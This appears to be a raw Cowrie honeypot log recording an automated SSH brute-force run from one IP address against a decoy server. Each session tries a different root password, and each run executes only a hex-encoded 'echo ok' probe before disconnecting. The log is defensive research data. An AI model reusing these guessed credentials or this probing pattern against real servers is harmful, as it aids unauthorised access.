{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:20.903286Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.904047Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.935803Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.937074Z","src_ip":"212.227.125.160","session":"cdcc3ca6ff95"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46152,"dst_ip":"1.2.3.4","dst_port":22,"session":"87b94ce96008","protocol":"ssh","message":"New connection: 212.227.125.160:46152 (1.2.3.4:22) [session: 87b94ce96008]","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.957486Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.958588Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:20.990923Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.login.success","username":"root","password":"aabbcc","message":"login attempt [root/aabbcc] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.096875Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:21.281732Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.282507Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.337749Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.338837Z","src_ip":"212.227.125.160","session":"87b94ce96008"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46156,"dst_ip":"1.2.3.4","dst_port":22,"session":"f71c05c8826f","protocol":"ssh","message":"New connection: 212.227.125.160:46156 (1.2.3.4:22) [session: f71c05c8826f]","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.359824Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.360594Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.383090Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.login.success","username":"root","password":"SUPERMAN1","message":"login attempt [root/SUPERMAN1] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.462273Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:21.575301Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.576007Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.602034Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.603388Z","src_ip":"212.227.125.160","session":"f71c05c8826f"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46162,"dst_ip":"1.2.3.4","dst_port":22,"session":"969ddcf934f5","protocol":"ssh","message":"New connection: 212.227.125.160:46162 (1.2.3.4:22) [session: 969ddcf934f5]","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.632460Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.644532Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.666874Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.login.success","username":"root","password":"Margaux","message":"login attempt [root/Margaux] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.867081Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:21.981726Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:21.982401Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.1","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.1 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.076953Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.078270Z","src_ip":"212.227.125.160","session":"969ddcf934f5"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46176,"dst_ip":"1.2.3.4","dst_port":22,"session":"a55259c18e93","protocol":"ssh","message":"New connection: 212.227.125.160:46176 (1.2.3.4:22) [session: a55259c18e93]","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.155806Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.220487Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.221200Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.login.success","username":"root","password":"MANON","message":"login attempt [root/MANON] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.367557Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:22.486384Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.487086Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.511020Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.session.closed","duration":"0.4","message":"Connection lost after 0.4 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.512023Z","src_ip":"212.227.125.160","session":"a55259c18e93"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46178,"dst_ip":"1.2.3.4","dst_port":22,"session":"e838b664e181","protocol":"ssh","message":"New connection: 212.227.125.160:46178 (1.2.3.4:22) [session: e838b664e181]","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.533898Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.543635Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.556702Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.login.success","username":"root","password":"GREGORY","message":"login attempt [root/GREGORY] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.653865Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:22.761372Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.762121Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.785732Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.786801Z","src_ip":"212.227.125.160","session":"e838b664e181"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46182,"dst_ip":"1.2.3.4","dst_port":22,"session":"5e9ca3541dd2","protocol":"ssh","message":"New connection: 212.227.125.160:46182 (1.2.3.4:22) [session: 5e9ca3541dd2]","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.808279Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.809004Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.833845Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.login.success","username":"root","password":"DOh","message":"login attempt [root/DOh] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:22.972838Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:23.064845Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.065485Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.091281Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.session.closed","duration":"0.3","message":"Connection lost after 0.3 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.092271Z","src_ip":"212.227.125.160","session":"5e9ca3541dd2"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46184,"dst_ip":"1.2.3.4","dst_port":22,"session":"516e28037ac1","protocol":"ssh","message":"New connection: 212.227.125.160:46184 (1.2.3.4:22) [session: 516e28037ac1]","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.113053Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.113728Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.136091Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.login.success","username":"root","password":"CORINNE","message":"login attempt [root/CORINNE] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.207252Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.session.params","arch":"linux-x64-lsb","message":[],"sensor":"my-vps","timestamp":"2025-08-26T10:28:23.317938Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.command.input","input":"echo -e \"\\x6F\\x6B\"","message":"CMD: echo -e \"\\x6F\\x6B\"","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.318686Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.log.closed","ttylog":"var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","size":3,"shasum":"eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80","duplicate":true,"duration":"0.0","message":"Closing TTY Log: var/lib/cowrie/tty/eafdc691c2945a067fa5de7bac393326241395a9cd11bc6737c7191859f13b80 after 0.0 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.346360Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.session.closed","duration":"0.2","message":"Connection lost after 0.2 seconds","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.347411Z","src_ip":"212.227.125.160","session":"516e28037ac1"}
{"eventid":"cowrie.session.connect","src_ip":"212.227.125.160","src_port":46196,"dst_ip":"1.2.3.4","dst_port":22,"session":"3851c34acd2b","protocol":"ssh","message":"New connection: 212.227.125.160:46196 (1.2.3.4:22) [session: 3851c34acd2b]","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.368411Z"}
{"eventid":"cowrie.client.version","version":"SSH-2.0-Go","message":"Remote SSH version: SSH-2.0-Go","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.370955Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
{"eventid":"cowrie.client.kex","hassh":"01ca35584ad5a1b66cf6a9846b5b2821","hasshAlgorithms":"curve25519-sha256@libssh.org,ecdh-sha2-nistp256,ecdh-sha2-nistp384,ecdh-sha2-nistp521,diffie-hellman-group14-sha1;aes128-ctr,aes192-ctr,aes256-ctr,aes128-gcm@openssh.com,chacha20-poly1305@openssh.com,arcfour256,arcfour128,arcfour,aes128-cbc,3des-cbc,aes128-gcm@openssh.com,aes128-cbc;hmac-sha2-256-etm@openssh.com,hmac-sha2-256,hmac-sha1,hmac-sha1-96;none","kexAlgs":["curve25519-sha256@libssh.org","ecdh-sha2-nistp256","ecdh-sha2-nistp384","ecdh-sha2-nistp521","diffie-hellman-group14-sha1"],"keyAlgs":["ssh-rsa-cert-v01@openssh.com","ssh-dss-cert-v01@openssh.com","ecdsa-sha2-nistp256-cert-v01@openssh.com","ecdsa-sha2-nistp384-cert-v01@openssh.com","ecdsa-sha2-nistp521-cert-v01@openssh.com","ssh-ed25519-cert-v01@openssh.com","ecdsa-sha2-nistp256","ecdsa-sha2-nistp384","ecdsa-sha2-nistp521","ssh-rsa","ssh-dss","ssh-ed25519"],"encCS":["aes128-ctr","aes192-ctr","aes256-ctr","aes128-gcm@openssh.com","chacha20-poly1305@openssh.com","arcfour256","arcfour128","arcfour","aes128-cbc","3des-cbc","aes128-gcm@openssh.com","aes128-cbc"],"macCS":["hmac-sha2-256-etm@openssh.com","hmac-sha2-256","hmac-sha1","hmac-sha1-96"],"compCS":["none"],"langCS":[""],"message":"SSH client hassh fingerprint: 01ca35584ad5a1b66cf6a9846b5b2821","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.391897Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
{"eventid":"cowrie.login.success","username":"root","password":"CAPUCINE","message":"login attempt [root/CAPUCINE] succeeded","sensor":"my-vps","timestamp":"2025-08-26T10:28:23.501238Z","src_ip":"212.227.125.160","session":"3851c34acd2b"}
